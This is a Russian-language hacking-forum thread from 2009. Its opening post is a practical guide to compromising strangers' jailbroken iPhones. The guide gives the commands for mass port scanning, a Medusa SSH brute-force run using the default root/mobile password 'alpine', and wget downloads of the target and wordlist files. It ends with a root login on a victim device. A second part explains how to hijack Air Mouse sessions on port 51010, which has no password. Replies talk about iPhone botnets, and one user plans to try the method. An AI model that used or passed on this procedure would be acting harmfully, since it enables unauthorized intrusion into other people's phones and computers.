Авторские статьи Удаленный взлом Iphone!

Discussion in 'Статьи' started by Xcontrol212, 10 Dec 2009.

  1. Xcontrol212

    Xcontrol212 Elder - Старейшина

    Joined:
    13 Feb 2008
    Messages:
    254
    Likes Received:
    110
    Reputations:
    7
    Предыстория

    Недавно в IT-новостях появилась информация о уязвимости в Iphone/Ipod Touch,что при установлении из Cydia приложения OpenSSH есть уязвимость.Уязвимость в том,что стоит стандартный пароль alpine.
    В статье я покажу как взломать Iphone через SSH,и как можно использовать root на Iphone.


    Инструменты для взлома

    1)Любой сканер портов,я предпочитаю dfind.(Скачать

    2)Windows-Дедик с мощным каналом

    3)Хостинг с SSH(для брута через SSH)


    Взламываем

    Первый шаг
    Ставим на Windows-дедик dfind,для удобвства создаем bat'ник со следующим содержанием:
    Code:
    dfind.exe -p 22 73.43.54.12 73.255.255.255 
    Запускаем сканер,ждем когда же будут результаты:
    [​IMG]

    В dfind сохраняет результаты в txt-файле dfind.txt
    Ждать надо примерно часа два-три,чтобы побольше набралось IP-адресов с открытым 22 портом.
    Лучше всего сканить Ip-адреса USA,т.к. компания Apple,американская фирма.


    Второй шаг
    Качаем SSH-клиент,например Putty( http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html )
    Заходим на свой SSH-акк,и ставим брутфорс Medusa.
    Настройка Medusa

    Закачиваем на сервак три файла на сервак:
    hosts.txt,login.txt,password.txt

    В hosts.txt добавляем айпи насканеные нами в виде:
    Code:
    87.123.51.79
    27.123.52.113
    27.123.52.140
    27.123.52.184
    27.123.54.33
    27.123.58.139
    27.123.61.139
    27.123.62.62
    87.123.62.155
    в login.txt добавляем лишь два логина:
    Code:
    root
    mobile
    В password.txt только пароль alpine
    Закачиваем на сервак:

    Code:
    wget http://site.com/hosts.txt
    Code:
    wget http://site.com/password.txt
    Code:
    wget http://site.com/login.txt
    Дальше выполняем следующую команду:
    Code:
    medusa -T 3 -H hosts.txt -U login.txt -P password.txt -O good.txt -M ssh
    [​IMG]

    Ждемс результата брута!
    Смотрем good.txt

    Через несколько минут у меня уже был 1 сбрученный ssh-акк к Iphone.
    Подконнектился через putty и вот я удаленно подсоединился к Iphone:
    Code:
    login as: root
    root@*******'s password:
    iPhone-blackas:~ root#
    
    Защита от SSH
    Через программу BossPrefs,вырубаешь SSH


    [​IMG]

    А так если вам не нужен OpenSSH,то вообще не закачивается его!

    Authorization bypas в Air Mouse

    Authorization bypass
    Уязвимость подобия той,когда нашли в jailbreak'нутом Iphone/Ipod Touch в службе SSH!

    После установки сервера на Windows 7,я запустил Air Mouse.exe и я увидел следующее:

    [​IMG]

    Порт по дефолту:51010
    Пароль по дефолту не стоит!
    Так мы сможем получить доступ к чужой мышке,надо иметь Iphone/Ipod Touch,сканер портов на порт 51010
    Сканим и подключаемся,и будет иметь доступ к чужой мышке.
    Вот такая уязвимость,получили доступ к чужой мrol21ышке!:)

    (С)Xcontrol212
     
    #1 Xcontrol212, 10 Dec 2009
    Last edited: 10 Dec 2009
    1 person likes this.
  2. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    в хакере давно типа токого было
     
    _________________________
  3. Xcontrol212

    Xcontrol212 Elder - Старейшина

    Joined:
    13 Feb 2008
    Messages:
    254
    Likes Received:
    110
    Reputations:
    7
    Хм,не видал!
     
  4. PhoeniX174

    PhoeniX174 Banned

    Joined:
    16 Oct 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    видел в хакере подобную статью, если не ошибаюсь то называется "Конь в яблоках"
     
  5. Xcontrol212

    Xcontrol212 Elder - Старейшина

    Joined:
    13 Feb 2008
    Messages:
    254
    Likes Received:
    110
    Reputations:
    7
    Угу,нашел
    ТУт я процесс описал более подробно= )
    http://www.xakep.ru/post/48932/default.asp
     
  6. GRobbeRZ

    GRobbeRZ Member

    Joined:
    14 Aug 2009
    Messages:
    37
    Likes Received:
    26
    Reputations:
    -11
    Спасибо познавательно! Попробуем
     
  7. ZaraZ

    ZaraZ Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    51
    Likes Received:
    17
    Reputations:
    4
    Ботнет из айфонов это что-то новое)
     
  8. Xtrem

    Xtrem Elder - Старейшина

    Joined:
    28 Jul 2007
    Messages:
    174
    Likes Received:
    8
    Reputations:
    0
    мда... сидия устанавливается только на взломанный айфон.. тоесть вы собственноручно его взламываете
    с тем же успехом можете у себя на компе установить себе коня или сборку хз какую виндовса хп, в который какойнить вася вшил свои дыры чтобы потом из вас сделать ботнет.
    а че вы хотите после взлома ифона чтоб он еще и норм робил??
    бред
    в нор бла бла бла лень писать
     
  9. Xcontrol212

    Xcontrol212 Elder - Старейшина

    Joined:
    13 Feb 2008
    Messages:
    254
    Likes Received:
    110
    Reputations:
    7
    А ломают прошивку,чтобы не платить деньги за каждую игру и программу,надо было знать...
    После jailbreak телефон айфон/айпод нормально робит


    человек это вы бред несете,google.ru почитал бы: OpenSSH система предпосылки которая позволяет вам подключить к вашему iPhone над wifi и перенести архивы от вашего компьютера к вашему iPhone

    Вообще то в Cydia загружается все с открытым исходным кодом,что там можно посмотреть исходный код
    Мда,что сказать,Ты даже не юзал айфон/айпод тач и говоришь такие вещи,иди лучше погугли информации,прежде чем писать бред....
     
    #9 Xcontrol212, 12 Dec 2009
    Last edited: 12 Dec 2009
  10. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    Мне кажется или только ленивый не писал про взлом iPhone через дефолтные 2 акка? Хорошо, что статья наглядная, но очень, очень изъезжено.
     
  11. Xcontrol212

    Xcontrol212 Elder - Старейшина

    Joined:
    13 Feb 2008
    Messages:
    254
    Likes Received:
    110
    Reputations:
    7
    вроде только на хакере писали,хотя я не находил нигде,писал сам,вот решил описать про взлом Iphone/Ipod Touch
    +на этих айфонах можно прокси поднять и т.д.)
     
Loading...